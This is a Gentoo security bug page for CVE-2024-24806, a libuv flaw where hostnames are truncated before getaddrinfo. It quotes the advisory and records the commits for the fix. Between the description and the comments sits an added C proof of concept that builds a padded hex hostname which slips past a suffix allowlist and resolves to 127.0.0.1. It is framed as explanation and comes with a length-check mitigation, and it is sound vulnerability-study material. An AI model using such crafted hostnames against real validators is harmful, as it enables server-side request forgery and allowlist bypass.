Bug 924127 (CVE-2024-24806) - <dev-libs/libuv-1.48.0: hostname truncation in getaddrinfo allows attacker-controlled lookup results
Alias: CVE-2024-24806
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: Normal normal
Assignee: Gentoo Security
Whiteboard: A3 [glsa? cleanup]
Keywords: PullRequest
Depends on: 924653 924891
Reported: 2024-02-08 22:30 UTC by Hank Leininger
Modified: 2024-04-20 13:31 UTC

See Also:
Package list:
Runtime testing required: ---


Description Hank Leininger 2024-02-08 22:30:48 UTC
From $URL:

  The uv_getaddrinfo function in src/unix/getaddrinfo.c (and its windows 
  counterpart src/win/getaddrinfo.c), truncates hostnames to 256 characters 
  before calling getaddrinfo. This behavior can be exploited to create addresses 
  like 0x00007f000001, which are considered valid by getaddrinfo and could allow 
  an attacker to craft payloads that resolve to unintended IP addresses, 
  bypassing developer checks.

The advisory has some credible scenarios/exploit cases for nodejs code, kubernetes request routing, web portals with vanity hostnames, etc. libuv is also used by bind-tools (dig, host, nslookup) so one can imagine scripts that can be tricked with interesting results.

libuv 1.48.0 fixes the issue.
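The following is an added illustration of the mechanism the report describes; it is example code written for this page, not libuv's code and not code from the advisory. It models the old behaviour as a copy into a fixed 256-byte buffer (an assumption for the model), builds the attacker string as `0x`, 245 zeros and `7f000001` (exactly 255 characters) followed by an allowlisted suffix, and then shows that a suffix check on the full string passes while libc's getaddrinfo parses the truncated remainder as the hex literal 0x7f000001, i.e. 127.0.0.1. The suffix `.trusted.example` and the application-side 253-character length check are assumptions; the length check is shown as a caller-side mitigation and makes no claim about how libuv 1.48.0 implements its fix.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>

/* Size of the fixed hostname buffer in this model of the pre-1.48.0
 * behaviour (assumption: 256 bytes, i.e. 255 characters plus NUL). */
#define HOST_BUF 256

/* Model of the old behaviour: copy and silently drop anything past the
 * buffer.  A stand-in written for this example, not libuv's code. */
static void truncate_like_old_libuv(const char *in, char out[HOST_BUF]) {
    snprintf(out, HOST_BUF, "%s", in);
}

/* The kind of allowlist test an application might run on the full string. */
static int ends_with(const char *s, const char *suffix) {
    size_t ls = strlen(s), lx = strlen(suffix);
    return ls >= lx && memcmp(s + ls - lx, suffix, lx) == 0;
}

/* Ask libc's getaddrinfo to interpret `host` as a numeric IPv4 literal only
 * (AI_NUMERICHOST, so no DNS traffic).  Returns dotted-quad text or NULL. */
static const char *numeric_v4(const char *host) {
    static char ip[INET_ADDRSTRLEN];
    struct addrinfo hints, *res = NULL;
    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_flags = AI_NUMERICHOST;
    if (getaddrinfo(host, NULL, &hints, &res) != 0)
        return NULL;
    const struct sockaddr_in *sin = (const struct sockaddr_in *)res->ai_addr;
    const char *r = inet_ntop(AF_INET, &sin->sin_addr, ip, sizeof ip);
    freeaddrinfo(res);
    return r;
}

/* What the old code would have handed to the resolver: truncate, then parse. */
static const char *resolve_after_old_truncation(const char *hostname) {
    char buf[HOST_BUF];
    truncate_like_old_libuv(hostname, buf);
    return numeric_v4(buf);
}

/* Build the attacker string: "0x", zero padding and "7f000001" fill exactly
 * 255 characters; `suffix` (e.g. ".trusted.example", a constructed value)
 * follows so that a check on the full string sees an allowlisted domain.
 * Caller frees the result. */
static char *build_payload(const char *suffix) {
    const char *prefix = "0x", *hex = "7f000001";   /* 0x7f000001 = 127.0.0.1 */
    size_t pad = (HOST_BUF - 1) - strlen(prefix) - strlen(hex);   /* 245 zeros */
    size_t n = (HOST_BUF - 1) + strlen(suffix), off = 0;
    char *p = malloc(n + 1);
    if (p == NULL) return NULL;
    memcpy(p + off, prefix, strlen(prefix)); off += strlen(prefix);
    memset(p + off, '0', pad);               off += pad;
    memcpy(p + off, hex, strlen(hex));       off += strlen(hex);
    memcpy(p + off, suffix, strlen(suffix)); off += strlen(suffix);
    p[off] = '\0';
    return p;
}

/* Caller-side mitigation (assumption, not libuv's fix): refuse anything longer
 * than a DNS name can legitimately be before it reaches any resolver. */
static int hostname_len_ok(const char *h) {
    return strlen(h) <= 253;
}

int main(void) {
    char *payload = build_payload(".trusted.example");
    if (payload == NULL) return 1;
    const char *as_given = numeric_v4(payload);
    const char *after_cut = resolve_after_old_truncation(payload);
    printf("length of supplied name    : %zu\n", strlen(payload));
    printf("ends with .trusted.example : %s\n", ends_with(payload, ".trusted.example") ? "yes" : "no");
    printf("numeric as given           : %s\n", as_given ? as_given : "no");
    printf("after 255-char truncation  : %s\n", after_cut ? after_cut : "not numeric");
    printf("passes length check        : %s\n", hostname_len_ok(payload) ? "yes" : "no");
    free(payload);
    return 0;
}
```

Build with `cc -o trunc trunc.c` and run; AI_NUMERICHOST keeps it entirely offline, and the parse it performs is the same one a real lookup would have done first. The wider lesson is that inet_aton-style parsing accepts hex, octal and fewer-than-four-part forms, so a validator that only recognises dotted quads, or that checks a suffix without also bounding the length, does not constrain where the lookup ends up.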
Comment 1 Larry the Git Cow gentoo-dev 2024-02-10 01:06:09 UTC
The bug has been referenced in the following commit(s):

commit b0bae683c34e84f5d252ce86b1fe844bd9445258
Author:     Hank Leininger <>
AuthorDate: 2024-02-09 22:06:06 +0000
Commit:     Jakov Smolić <>
CommitDate: 2024-02-10 01:02:31 +0000

    dev-libs/libuv: add 1.48.0, update SRC_URI
    Signed-off-by: Hank Leininger <>
    Signed-off-by: Jakov Smolić <>

 dev-libs/libuv/Manifest            |  1 +
 dev-libs/libuv/libuv-1.48.0.ebuild | 54 ++++++++++++++++++++++++++++++++++++++
 dev-libs/libuv/libuv-9999.ebuild   |  3 ++-
 3 files changed, 57 insertions(+), 1 deletion(-)
Comment 2 Larry the Git Cow gentoo-dev 2024-04-20 13:30:34 UTC
The bug has been referenced in the following commit(s):

commit 4f2af276017530099965ad9a89cdf0341d0246d1
Author:     Andreas Sturmlechner <>
AuthorDate: 2024-04-20 13:29:53 +0000
Commit:     Andreas Sturmlechner <>
CommitDate: 2024-04-20 13:30:05 +0000

    dev-libs/libuv: drop 1.47.0-r1
    Signed-off-by: Andreas Sturmlechner <>

 dev-libs/libuv/Manifest                            |  1 -
 dev-libs/libuv/files/libuv-1.47.0-darwin17.patch   | 26 ----------
 .../libuv/files/libuv-1.47.0-hppa-kernel.patch     | 32 ------------
 dev-libs/libuv/files/libuv-1.47.0-ipv6-tests.patch | 54 --------------------
 dev-libs/libuv/libuv-1.47.0-r1.ebuild              | 59 ----------------------
 5 files changed, 172 deletions(-)
Comment 3 Andreas Sturmlechner gentoo-dev 2024-04-20 13:31:02 UTC
Cleanup done, kde proj out.